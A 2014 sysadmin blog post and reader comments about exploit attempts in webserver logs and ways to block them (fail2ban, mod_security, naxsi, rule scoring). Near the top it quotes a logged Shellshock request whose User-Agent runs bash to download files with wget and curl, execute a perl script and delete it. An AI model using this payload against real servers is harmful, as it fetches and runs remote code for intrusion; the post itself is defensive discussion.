Paying attention to webserver logs

Tuesday, 2 December 2014

If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt: - [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget ; \
curl -O;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts: - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban, (or even non-standard SSH ports).

For Apache/webserver exploits we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP IDS project and are horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else things the rules are bad - which is what I thought of hte PHP-IDS set - I guess it's hard to know.

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.




Comments On This Entry

[gravitar] gregoa

Submitted at 14:41:07 on 2 december 2014

I'm using fail2ban as well for webserver exploit attempts. Works quite fine for at least some typical patterns.

[author] Steve Kemp

Submitted at 14:44:06 on 2 december 2014

I've seen people use fail2ban against webserver logs before - but generally speaking they tend have very loose rule definitions.

If I were to publish a list of patterns I'd be very specific about what they were compared to - for example "referer", "user-agent", "request", "method", etc.

[gravitar] Gunnar Wolf

Submitted at 14:56:14 on 2 december 2014

I use Suhosin on my (still-Squeeze) webserver, and it is one of the bits I miss nowadays, as it got removed from testing still before Wheezy. It helps a lot getting the information you mention.

Of course, I have had a long time to adopt it, and I have not done so. So... It's a package I find quite useful, but know that causes more maintenance burden than what I can handle.

[author] Steve Kemp

Submitted at 15:06:40 on 2 december 2014

I don't run PHP on my own personal hosts, but I do remember suhosin as being both useful and frustrating to configure.

I've seen people who are PHP-free use regular expressions such as "\.php" to block PHP-directed exploits - and that's exactly the kind of pattern that can cause problems if you use fail2ban, or similar, as it is grossly too-broad.

[author] Steve Kemp

Submitted at 15:40:46 on 2 december 2014

[gravitar] Diego Elio Pettenò

Submitted at 19:13:49 on 2 december 2014

I have built a ModSecurity-based ruleset for things like this — it can even be used independently if you don't like the OWASP ruleset by default

I also have descriptions of the techniques I came up with in my blog, such as

[gravitar] me

Submitted at 21:08:33 on 2 december 2014

Is this really necessary? I mean, in particular the spam one. SSH blocking is risky enough as you might lock yourself out. But the risk of brute force password success is much more real than that of brute force shellshock success. And the spam is a nuisance, but not a threat to security, is it? Fail2ban etc. can reduce the risk of a naive user account being compromised because of a weak password. That is at least a real threat on multiuser networks, and the rate limiting does indeed reduce the risk by limiting the number of attempts. BTW. I have seen it show up in Google analytics, too. Seem to be SEO spam.

[author] Steve Kemp

Submitted at 21:21:52 on 2 december 2014

Possibly not - the spam one in particular just annoyed me. Thousands of hits over a few days that's just something we shouldn't be tolerating.

[gravitar] Steven C.

Submitted at 22:57:31 on 2 december 2014

Spam and aggressive crawls can take a substantial portion of your server's resources unless you're lucky enough serve only static files.

I think it's worth deciding on a metric and a threshold at which point an IP, subnet, crawler or user agent, ISP, or whole country/region is best denied access or subject to other restrictions.

The cost/benefit of serving a particular visitor will depend what you're hosting, who/where you customers are; it may vary for different websites or services on a server, or even for different sections/features of the websites (GET vs. POST requests?). It probably is worth putting some amount of time into studying this, if you could potentially reduce the load on your server[s] tenfold.

[gravitar] Daniel

Submitted at 07:31:21 on 3 december 2014

I used to use mod_rewrite to block referrer spam. The main reason then was to get a more accurate result of my weblog analyzer. Of course, the rules needed to be maintained manually and sites appear and disappear. So this is quite a lot of work (but I'm sure, you would have the same workload using fail2ban to block such referrer spam). I'm not doing this anymore (no weblog analyzers running :))

I further make use of fail2ban to block some attack attempts. I agree, that there is no unique pattern and every day there are some new. You would probably need some spamhaus-alike project to collect patterns and automatically distribute them to systems. Again, atm this is manual work AFAIK. However, maybe we can share pattern we discovered? Alioth?

[author] Steve Kemp

Submitted at 08:44:15 on 3 december 2014

This is why I suspect that rules are pretty personal - the rules which I'd block would included "Wordpress Login attempts", on the basis that I don't use wordpress.

But clearly a ruleset that defaulted to blocking wordpress wouldn't be useful to others, given how popular it is.

And that is exactly the reason why deciding on a threshold to block is going to be an administrators decision. I suspect the best that can be done is to divide rules into "Always bad" and "You need to decided".

Always-bad rules would include the recent Drupal exploit, Shellshock, etc. Rules that require manual decisions would include PHP-things, Perl-things, and similar.

[gravitar] Jeremiah C. Foster

Submitted at 13:37:54 on 4 december 2014

I thought a spamassassin-like project might be useful, create a Bayseian filter for incoming requests? It would require a lot of work. :/

[gravitar] Steven C.

Submitted at 11:40:43 on 5 december 2014

SpamAssassin allows to override scores for a rule, which would be useful here; so you could override the score of WORDPRESS_LOGIN_ATTEMPT from 0.1 (slightly spammy) to 100.0 (definitely block).

I think it'd be more useful to group sets of rules into categories or parent classes, to more easily adjust scores up/down for all Wordpress things at once, or even all PHP things if you don't use it.

Except - it doesn't sound very practical to accumulate scores across multiple requests from an IP. If your website is popular, there'd be so many IPs (and perhaps many IPv6 prefixes too).

If you could somehow do this, it'd be nice to share that reputation data between many servers at a site, or with the community.

Another problem is that in the past year we saw a botnet of over 30,000 being used to bruteforce Wordpress; filtering that many IPs in Linux seems to be not trivial (I think ipt_recent was the best option).

Oh by the way, Nginx naxsi module already does heuristic filtering, essentially blocking requests if they contained many odd symbols in the request or headers; which the exploits for Shellshock, Drupageddon etc. all do.

[gravitar] Amos

Submitted at 01:37:18 on 9 december 2014

Re: Steven C.'s comment about filtering massive numbers of addresses - ipset might help here, e.g.


Comments are closed on posts which are more than ten days old.

Recent Posts

Recent Tags